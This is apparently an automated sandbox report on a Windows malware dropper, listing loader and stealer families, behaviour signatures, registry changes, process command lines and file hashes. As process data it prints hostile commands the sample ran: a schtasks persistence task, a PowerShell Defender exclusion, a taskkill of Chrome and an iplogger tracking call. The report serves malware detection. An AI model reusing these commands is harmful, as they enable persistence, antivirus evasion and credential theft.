Analysis Overview
SHA256
befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec
Threat Level: Known bad
The file 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Nullmixer family
SectopRAT
Socelars payload
PrivateLoader
Vidar
Redline family
Sectoprat family
NullMixer
SectopRAT payload
RedLine
Vidar family
Socelars
Socelars family
RedLine payload
xmrig
Xmrig family
Vidar Stealer
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
ASPack v2.12-2.42
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Looks up geolocation information via web service
Checks installed software on the system
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Checks processor information in registry
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:33
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:33
Reported
2024-11-25 09:36
Platform
win7-20240903-en
Max time kernel
60s
Max time network
145s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
Vidar
Vidar family
Vidar Stealer
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2644 set thread context of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{75BD1881-AB10-11EF-9982-5A85C185DB3E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Image path | Command line |
| C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe" |
| C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 9aa6e16872.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 1710990cbc64.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe | 08240101651be7e1.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe | 9aa6e16872.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c c862a054a35.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe | c862a054a35.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe | 453c5fa76a849.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe | 4f5baa1083db067.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | 1710990cbc64.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe | 53516815d3135fe3.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | e4b2f18fb52218.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe | 08240101651be7e010.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe | f34b9ab9db6d16.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe | "C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | "C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe" -a |
| C:\Users\Admin\AppData\Local\Temp\chrome2.exe | "C:\Users\Admin\AppData\Local\Temp\chrome2.exe" |
| C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" |
| C:\Windows\winnetdriv.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527218 0 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 432 |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c taskkill /f /im chrome.exe |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im chrome.exe |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Users\Admin\AppData\Roaming\services64.exe | "C:\Users\Admin\AppData\Roaming\services64.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE |
| C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd" " |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1996 CREDAT:275457 /prefetch:2 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe" |
Network
Files
memory/2248-273-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2248-271-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2248-268-0x0000000064940000-0x0000000064959000-memory.dmp
C:\ProgramData\softokn3.dll
| MD5 | a378c450e6ad9f1e0356ed46da190990 |
| SHA1 | d457a2c162391d2ea30ec2dc62c8fb3b973f6a66 |
| SHA256 | b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978 |
| SHA512 | e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5 |
memory/840-288-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/840-287-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/840-286-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/540-304-0x0000000000400000-0x0000000002CC9000-memory.dmp
memory/1120-307-0x00000000007D0000-0x00000000007DE000-memory.dmp
C:\Users\Admin\AppData\Roaming\services64.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/2220-311-0x000000013F180000-0x000000013F190000-memory.dmp
memory/2644-312-0x00000000065F0000-0x000000000667C000-memory.dmp
memory/2644-313-0x0000000000960000-0x000000000097E000-memory.dmp
memory/1704-314-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-322-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1704-320-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-318-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-316-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-323-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-326-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1704-324-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\favicon[1].png
| MD5 | 18c023bc439b446f91bf942270882422 |
| SHA1 | 768d59e3085976dba252232a65a4af562675f782 |
| SHA256 | e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482 |
| SHA512 | a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7f6bc2d512d78587dc64b03b7ff5486 |
| SHA1 | 0260dbe97c32ea43e20ec09a79f993ca4155fefb |
| SHA256 | 3d5e10808a148f64e35bf9299f92beb728a87f6660a485358bf2b8afd97bcbf2 |
| SHA512 | 3bc7e85ebd8d5187a8acedba92d0054664ead0710097c05606386f14196e23bf2298b03105951283b6ddf44fb8ef7c0fb862afd6df49c44d9f9ca6a4afd32de1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2d1371dd5e66add7b25efc3947a57f0d |
| SHA1 | 4bffc35c736500f2db0aec3e49e62d3d543412c8 |
| SHA256 | e878d2ee639c211fd3411fea73ba25d2210b3bb552f857ffbaaacf366ce37fad |
| SHA512 | 19f7de2edf9be2934ba8508427dc6ec6de27e204be5fef8d36da601df521bf9167520c6116f54f20a5837095511612caadd95eaa881931737f59ba834a678545 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | df717b19780d88cd645c95a5a07f603f |
| SHA1 | ef6e24d4191a0359b24052c5967e50ef8b82fcfb |
| SHA256 | fb5f90206a2fbeb50721257f7ecc0c1a0e82510a765a83c1efff85d246294b85 |
| SHA512 | c85fbb12e6b27503542b29fb56a6104294ea04fa3ddce7ba5993383d0ab1a9b5056e46199a63fb163fb04d774d1d536b6f769c55c9c1d6956d57b12eb61d4194 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 368f1e117b0d089e593657f3300e0c30 |
| SHA1 | 2c789dbf1938eafd2efd7574cc57b179ab7125bf |
| SHA256 | 1212b58fac330689113245351f2b03680c5bc5cbb84358ec6ca8b1a16f5a0274 |
| SHA512 | 2a4db11c1ab6c89bed93ce0f2288904430160418c9df820feac31d0b34d5e793eb08b0c9a308d40e700c7ef2c9ec7c7d194a13195395db1818cac32a3cea5dc7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2676e1a5576d8ec68908e3861e4515ab |
| SHA1 | eb0a6655d8b2ff844ac70e1ce5eb73c821e16763 |
| SHA256 | d19a606869fb3d9772f2ed7e2da68e1862b8676a6653fb0e2da11714dc4f71ea |
| SHA512 | 9eaa62c89d7ad1c207f2561e538b9b727b3bec011fc00237feaf5d8645f51085e347b36e2a31acb2f0d910aaa2275c489763aaa0af7b84b91058ef862a056541 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d7a54a951cd59a6e1622dee1d3a0d79e |
| SHA1 | dd7fb8ac0bb7d8809922fe2f64db124102ad9099 |
| SHA256 | 2efc4267a4a91d7756ccb2c9d3a61b2ceada9132c3596b9dc144976010da7c8a |
| SHA512 | 9bb1baf68bffa0ff97687634de6948141397ef1b3edc5adfb47ced5c29339835cca90b377d45b66cd377482624735d6ec7e4d12d990cc61b33e4b0b8242ef6aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
